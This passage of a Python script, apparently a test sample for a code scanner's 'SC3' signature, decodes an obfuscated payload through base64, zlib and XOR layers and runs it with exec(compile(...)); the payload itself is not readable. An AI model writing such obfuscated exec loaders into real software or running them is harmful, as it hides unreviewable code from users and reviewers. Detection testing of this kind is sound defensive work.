lH/vUbLMhE+DZeG/Zeolo6CmvMHlskL7TQniofOjCSExtwVkOQnozmJsJ0YRP5KuDxevq+ge7ve9ZQqv+09cf869cfptw6Yg=="
_K = bytes.fromhex("9d4450d5aaf202eace60475c")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
